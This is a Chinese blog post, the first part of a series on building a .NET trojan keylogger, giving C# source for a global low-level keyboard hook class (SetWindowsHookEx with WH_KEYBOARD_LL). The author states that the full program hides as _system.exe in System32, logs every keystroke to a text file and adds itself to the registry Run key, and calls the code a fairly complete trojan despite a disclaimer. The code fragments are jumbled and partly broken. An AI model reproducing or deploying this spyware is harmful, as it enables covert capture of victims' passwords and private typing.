.net木马的实现-开机键盘记录 - 1 Hook类的实现

最新推荐文章于 2022-06-22 16:52:35 发布
最新推荐文章于 2022-06-22 16:52:35 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: .net 文章标签: hook .net keyboard system user report
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/adamxx/article/details/526809
版权

 

.net木马的实现-开机键盘记录

1  Hook类的实现

网上这方面的内容很多

 

整个程序包含了4个类,From1,Hook, RegistryReport, Report.

 

Hook类返回一个键盘按下事件KeyboardEvent,并把按下键的信息发送给From1类,From1捕获到事件后,在调用Report类的WriteDate方法,写入文本文件,而RegistryReport负责在启动是向注册表添加信息.

 

 

我们先来说HOOK.

木马不外呼就是获取键盘消息,这就要使用到HOOK技术,既键盘钩子.HOOK技术的资料网上也有很多,大家可以找来看,我这里就不详细说名了.

 

//安装钩子

[DllImport( " User32.dll " ,CharSet  =  CharSet.Auto)] 
 public   static   extern  IntPtr SetWindowsHookEx(HookType hookType,HookProc hook,IntPtr instance, int  threadID);

 

[DllImport( " User32.dll " ,CharSet  =  CharSet.Auto)] 
 public   static   extern  IntPtr CallNextHookEx(IntPtr hookHandle,  int  code,  int  wParam, IntPtr lParam); 

 

[DllImport( " User32.dll " ,CharSet  =  CharSet.Auto)] 
 public   static   extern   bool  UnhookWindowsHookEx(IntPtr hookHandle); 

 

 

  //调用下一个钩子 //卸载钩子 //钩子类型

 

 

 

首先在定义一个全局委托,这里说全局其实是不大合适的.

这就是键盘事件句柄,有2个参数KeyboardEvents和Keys, KeyboardEvents结构定义了键盘消息的状态,是按下还是抬起.而System.Windows.Forms.Keys指示是哪一个键.

 

我们先来看看HOOK类的构造函数.

public   delegate  IntPtr HookProc( int  code,  int  wParam, IntPtr lParam); 



 private  IntPtr instance;     // 当前实例的句柄 



private  IntPtr hookHandle;  // 钩子的句柄 



private   int  threadID;      // 要挂钩的线程句柄 



private  HookProc hookProcEx; // hook委托 



public   event  KeyboardEventHandler KeyboardEvent;  // 自定义键盘事件 
public   delegate   void  KeyboardEventHandler(KeyboardEvents keyEvent ,System.Windows.Forms.Keys key); 

 

 

 

 

SetWindowsHookEx函数成功后,返回一个非零钩子句柄给hookHandle.在SetWindowsHookEx中将回调hookProcEx委托,他在先前hookProcEx = new HookProc(hookProc);于是当有键盘消息时他将执行

public  IntPtr hookProc( int  code,  int  wParam, IntPtr lParam)
            if(code >= 0)
               KeyboardEvents kEvent = (KeyboardEvents)wParam; 
               //如果事件不是KeyDown, KeyUp, SystemKeyDown, SystemKeyUp 
               //执行CallNextHookEx,调用下一个钩子. 
                if (kEvent != KeyboardEvents.KeyDown        && 
                     kEvent != KeyboardEvents.KeyUp          &&
                     kEvent != KeyboardEvents.SystemKeyDown && 
                     kEvent != KeyboardEvents.SystemKeyUp) 
                         return CallNextHookEx(this.hookHandle,(int)HookType.WH_KEYBOARD_LL,wParam, lParam); 
                } 
               //如果是KeyDown, KeyUp, SystemKeyDown, SystemKeyUp 
               //则执行以下的,我们把lParam参数映射到一个KeyboardHookStruct结构中 
               KeyboardHookStruct MyKey = new KeyboardHookStruct(); 
               Type t = MyKey.GetType(); 
               MyKey = (KeyboardHookStruct)Marshal.PtrToStructure(lParam,t); 
               Keys keyData=(Keys)MyKey.vkCode; 
               //产生键盘事件 
               KeyboardEvent(kEvent, keyData); 
         } 
         return CallNextHookEx(this.hookHandle,(int)HookType.WH_KEYBOARD_LL,wParam, lParam); 
}  

 

KeyboardHookStruct结构如下
[StructLayout(LayoutKind.Sequential)] 
          public   struct  KeyboardHookStruct
         public int vkCode; //表示一个在1到254间的虚似键盘码
         public int scanCode; //表示硬件扫描码
         public int flags; 
         public int time; 
         public int dwExtraInfo; 
}  

 

 

 

Marshal.PtrToStructure这个方法可以把非托管的变量转换为一个托管的变量.参数中要给出托管变量的类型(TYPE). 于是我们可以通过这种方式看到键盘消息中的虚拟键码MyKey.vkCode;

 

Keys keyData=(Keys)MyKey.vkCode;

 

通过上面的方式,转换成System.Windows.Forms.Keys枚举.

 

得到键盘消息后,我们就把键盘消息封装在一个叫做KeyboardHookStruct kEvent的结构里,并产生事件.

 

KeyboardEvent(kEvent, keyData);

 

就这样一个键盘事件就发送出去了.

 

最后还有卸载钩子. 这就是HOOK类的实现.我们在来看看From1是怎么捕获到键盘事件并处理的.

public   bool  UnHook()
         return Hook.UnhookWindowsHookEx(this.hookHandle); 
}  

 

 

 

 

 

 

 

 

 

public  Hook()
     this.instance = 
     Marshal.GetHINSTANCE(Assembly.GetExecutingAssembly().GetModules()[0]);//反射当前的实例 
     this.threadID = 0;              //由于是全局钩子, threadID参数为0 
     hookHandle = IntPtr.Zero;       //暂时初始化为IntPtr.Zero 
     hookProcEx = new HookProc(hookProc);  //实例化钩子委托,既钩子回调函数指针 
}  

在构造函数中我们初始化了一些字段,现在来看看HOOK类是如何捕获键盘消息并产生事件的.其中有2个函数共外部调用public bool SetHook(),public bool UnHook();一个是安装钩子,一个是卸载钩子.

public   bool  SetHook()
               this.hookHandle = SetWindowsHookEx(HookType.WH_KEYBOARD_LL,hookProcEx,this.instance,this.threadID); 
               return ((int)hookHandle != 0); 
}  

 

public   enum  HookType
              WH_JOURNALRECORD       = 0
              WH_JOURNALPLAYBACK     = 1
              WH_KEYBOARD            = 2
              WH_GETMESSAGE          = 3
              WH_CALLWNDPROC         = 4
              WH_CBT                 = 5
              WH_SYSMSGFILTER        = 6
              WH_MOUSE               = 7
              WH_HARDWARE            = 8
              WH_DEBUG               = 9
              WH_SHELL               = 10
              WH_FOREGROUNDIDLE      = 11
              WH_CALLWNDPROCRET      = 12
              WH_KEYBOARD_LL         = 13
              WH_MOUSE_LL            = 14
              WH_MSGFILTER           = -1
         }  

 

public   enum  KeyboardEvents
         KeyDown          = 0x0100
         KeyUp              = 0x0101
         SystemKeyDown   = 0x0104
         SystemKeyUp         = 0x0105 
}  

 

 

 

 

 

 

 

, 但大多没给出全部代码或者没有完整实现木马功能 , 这篇文章可能会有所帮助 . 我给出完整的代码不是提倡使用木马 , 只是在技术的谈论 .

 首先,这是一个较为完整的木马程序,运行或编译后会在System32下建一个名为 keyReport.txt的文本文件用来记录所有按键消息,并且在 System32下会有一个名为 _system.exe木马主体.在注册表CurrentUser,Software//Microsoft//Windows//CurrentVersion//run的位置会叫上一个启动项,运行和编译请注意.
adamxx
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[网络安全自学篇] 二十五.Web安全学习路线及木马、病毒和防御初探
杨秀璋的专栏
11-12 3万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了分享机器学习在安全领域的应用,并复现一个基于机器学习(逻辑回归)的恶意请求识别。这篇文章简单叙述了Web安全学习路线,并实现了最简单的木马和病毒代码,希望对读者有所帮助。
.net木马实现-开机键盘记录源代码
11-10 2092
.net木马实现-开机键盘记录 (原创) 源代码   From1.csusing System; using System.Drawing; using System.Collections; using System.ComponentModel; using System.Windows.Forms; using System.Da
.net木马实现-开机键盘记录 - 2 From1
11-10 1025
net木马实现-开机键盘记录2 From1前面我们看到Hook实现,现在我们在来看看From1是怎么捕获到键盘事件并处理的.   首先还是他的构造函数 private Hook MyHook; private Report MyReport; private RegistryReport MyRegistryReport; private string keyEve
.net木马实现-开机键盘记录 - 3 RegistryReportReport
11-10 1049
 .net木马实现-开机键盘记录3  RegistryReportReport 这是RegistryReport 实现   这是Report实现:   public void FirstWrite()          {               StreamWriter sw = new StreamWriter("c:/windo
使用WINIO进行驱动层的键盘记录
ainn_pp的专栏
05-29 3723
突然对QQ的安全机制起了兴趣.. 想来利用检测键盘状态来做键盘记录应该很容易.安全软件也不能认为这种需求为非法.那QQ怎么防似记录呢. 做个实验. 随便写个程序,每帧都去读取键盘状态.行不行? for(int i = 8; i <=255; i++) { if( GetAsyncKeyState(i) & 1 == 1 ) { cout << i
调戏木马病毒的正确姿势-基础篇
chengman3837的博客
12-29 1531
本文参与i春秋社区原创文章奖励计划,未经许可禁止转载! 目录 ----------------------理论基础篇------------------- 从科幻小说说起: 危险的潘多拉盒子 来说说应用程序编程接口 工欲善其事必先利其器...
恶意软件实现原理解析
深耕安全技术研究
06-22 899
恶意软件实现
iOS、Mac开源项目记录 - From TimLiu-iOS
RationalGo的专栏
03-05 2232
本篇博文并非本人整理,是从下面大神的Github下载,为了方便自己查看所以发布到这里。感谢大神整理。 来自:https://github.com/huang5556019/huang5556019.github.io github排名:https://github.com/trending github搜索:https://github.com/search UI 下拉刷新
SetWindowsHookEx: 全局钩子实现键盘记录Hook Steam
最新发布
12-31
SetWindowsHookEx 钩子(Hook),是Windows消息处理机制的一个平台,应用程序可以在上面设置子程以监视指定窗口的某种消息,而且所监视的窗口可以是其他进程所创建的。当消息到达后,在目标窗口处理函数之前处理它。...
apache-atlas-2.1.0-hbase-hook.tar.gz
05-10
压缩包内的“apache-atlas-hbase-hook-2.1.0”文件包含了实现上述功能所需的全部组件和配置文件。安装和配置此Hook通常包括以下步骤: 1. **解压文件**:首先,你需要解压“apache-atlas-2.1.0-hbase-hook.tar.gz”...
apache-atlas-2.1.0-kafka-hook.tar.gz
05-10
在"apache-atlas-kafka-hook-2.1.0"这个子目录中,你可能会找到以下关键组件和文件: 1. **配置文件**:通常包括`atlas-application.properties`,这是Atlas的主要配置文件,你可以在这里设置Kafka Hook的相关参数...
.NET Hook-开源
05-25
标题中的".NET Hook-开源"指的是一个.NET框架下的开源钩子技术实现,它允许开发者在.NET程序集的函数调用入口处插入自定义代码。钩子技术是编程中的一种常见手段,它允许我们监控或修改特定函数的行为。在这个.NET...
apache-atlas-2.1.0-falcon-hook.tar.gz
05-10
Apache Atlas 是一个元数据管理框架,专为大数据环境设计,用于提供数据治理、安全和合规性...这个压缩包中的 "apache-atlas-falcon-hook-2.1.0" 文件可能是实际的集成组件,用于部署和配置在相应的 Hadoop 集群上。
.net实现游戏外挂,完整代码
11-10 3160
.net实现游戏外挂,完整代码(原创)   using System;         using System.Drawing;         using System.Collections;         using System.Compone
浅谈中缀表达式的求值(带符号,等于,不等于,大于,小于,与,或,非,等等)
08-30 2675
我们知道中缀表达式的求值,通常都是先转换为后缀表达式,在通过堆栈求出后缀表达式的值,对于这点,如果有不太清楚的请参见:http://202.113.89.254/DataStructure/DS/web/zhanhuoduilie/zhanhuoduilie3.3.1.htm(原理)http://tech.ccw.com.cn/article/252014.htm(实现) 对于Ch
远程鼠标控制
11-14 2356
远程鼠标控制-服务端    以前不懂网络编程的时候,感觉远程桌面是一个好神奇的技术,很神秘,现在了解这方面的知识后才觉得也没什么,前几天,用C#写了一个远程鼠标控制的东东,给感兴趣的朋友参考一下。转贴请注明出处。我先引用一篇别人的文章:Socket编程基础    本章以Berkeley Socket为主,主要介绍网络编程时常用的调用和程序使用它们的方法及基本
在ASP.NET中使用LINQ(第一部分)
05-18 1491
在ASP.NET中使用LINQ(第一部分) 【原文地址】Using LINQ with ASP.NET (Part 1) 【原文发表日期】Sunday, May 14, 2006 9:49 PM最近使我激动不已的新鲜事之一就是LINQ系列技术的出现,包括LINQ,DLINQ,XLINQ和不久后的其他技术。 LINQ将被完全集成到代号为Orcas的下个版本Visual Studio中
.net实现游戏外挂 二
11-10 1393
 前面我们讲述了一个按键精灵的实现,现在的问题如何监视HP 既血的变化,来控制 补血.   先看下面几个API函数:     第一个函数BitBlt 就是用来截屏的.前面我们定义了timer2,下在我们来看看他是用来做什么的:    private void timer2_Tick(object sender, Sys
windows平台下个人防火墙的设计与实现.doc
07-07
1. 网络安全:个人防火墙需要监控和阻止未经授权的网络数据包,以保护计算机免受木马和病毒的侵扰。 2. 核心过滤技术: Filter-Hook Driver 是个人防火墙实现的核心过滤技术,它可以对流经计算机的网络数据包进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值